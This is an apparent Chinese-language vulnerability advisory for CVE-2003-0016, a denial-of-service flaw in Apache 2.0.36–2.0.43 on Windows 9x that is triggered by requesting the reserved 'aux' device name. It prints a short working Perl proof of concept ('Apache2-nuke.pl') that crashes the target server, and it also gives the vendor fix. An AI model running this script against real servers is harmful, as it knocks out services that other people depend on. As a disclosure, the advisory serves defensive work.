发布日期：2003-01-22
更新日期：2003-01-29

受影响系统：

Apache Software Foundation Apache 2.0.43
Apache Software Foundation Apache 2.0.42
Apache Software Foundation Apache 2.0.41
Apache Software Foundation Apache 2.0.40
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.36

不受影响系统：

Apache Software Foundation Apache 2.0.44

描述：

---

BUGTRAQ  ID: 6662
CVE(CAN) ID: CVE-2003-0016

Apache Web Server是一款开放源代码的HTTP服务程序。

Apache WEB服务程序对保留MS-DOS设备名的HTTP GET请求处理不正确，远程攻击者可以利用这个漏洞对Apache WEB服务进行拒绝服务攻击。

这个漏洞只存在于运行在Windows9x版本下的Apache，由于ap_directory_walk函数错误的检查，攻击者请求保留的"aux"设备名就可以导致WEB服务崩溃。

<*来源：Matthew Murphy （mattmurphy@kc.rr.com）
  
  链接：http://lists.netsys.com/pipermail/full-disclosure/2003-January/003653.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Matthew Murphy （mattmurphy@kc.rr.com）提供了如下测试方法：

--- Apache2-nuke.pl ---
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
    print STDOUT "Usage: perl $0 <host> <port=80>";
    exit;
}
if (@ARGV == 2) {
    $port = $ARGV[1];
} else {
    $port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";
--- Apache2-nuke.pl ---

建议：

---

厂商补丁：

Apache Software Foundation
--------------------------
目前厂商已经在新版的软件中修复了这个安全问题，请到厂商的主页下载：

http://www.apache.org/dist/httpd/

浏览次数：2867
严重程度：0（网友投票）